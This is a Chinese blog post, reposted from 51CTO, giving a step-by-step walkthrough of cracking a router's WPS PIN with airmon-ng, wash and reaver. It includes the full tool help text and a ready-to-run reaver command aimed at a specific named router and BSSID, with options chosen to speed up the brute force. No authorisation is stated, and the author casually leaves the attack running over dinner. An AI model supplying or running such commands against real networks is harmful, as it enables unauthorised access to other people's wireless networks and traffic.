开启网卡监听模式
|
1
|
airmon-ng start wlan2
|
查看开启QSS快速连接功能的路由器
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
root@kali:~# wash --help
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
cheffner
@tacnetsol.com>
Required Arguments:
-i, --interface=<
iface
> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<
num
> Channel to listen on [auto]
-o, --out-file=<
file
> Write data to file
-n, --probes=<
num
> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help
Example:
wash -i mon0
|
使用-C参数,BSSID为AP的MAC,channel是信道,RSSI是信号值,数字部分越小代表信号越强,WPS Locked就是WPS锁死机制,ESSID是信号名称
|
1
|
wash -i mon0 -C
|
选定FAST_D46F76路由器开始攻击
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
root@kali:~# reaver --help
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
cheffner
@tacnetsol.com>
Required Arguments:
-i, --interface=<
wlan
> Name of the monitor-mode interface to use
-b, --bssid=<
mac
> BSSID of the target AP
Optional Arguments:
-m, --mac=<
mac
> MAC of the host system
-e, --essid=<
ssid
> ESSID of the target AP
-c, --channel=<
channel
> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<
file
> Send output to a log file [stdout]
-s, --session=<
file
> Restore a previous session file
-C, --exec=<
command
> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<
wps
pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<
seconds
> Set the delay between pin attempts [1]
-l, --lock-delay=<
seconds
> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<
num
> Quit after num pin attempts
-x, --fail-wait=<
seconds
> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<
x:y
> Sleep for y seconds every x pin attempts
-t, --timeout=<
seconds
> Set the receive timeout period [5]
-T, --m57-timeout=<
seconds
> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
|
使用如下参数
|
1
|
reaver –i mon0 -b 28:2C:B2:D4:6F:76 -a -S -d 3 -t 3 -vv -c 1
|
-i 网卡的监视接口
-b 目标AP的MAC地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-d 即delay,延时 预设为1秒
-t 即timeout,超时 每次穷举等待反馈的最长时间
-vv 显示更多的非严重警告
-c 指定信道,可以方便找到信号
晚饭吃完回来,希望能够破解出来:)
本文转自文东会博客51CTO博客,原文链接http://blog.51cto.com/hackerwang/1420938如需转载请自行联系原作者
谢文东666
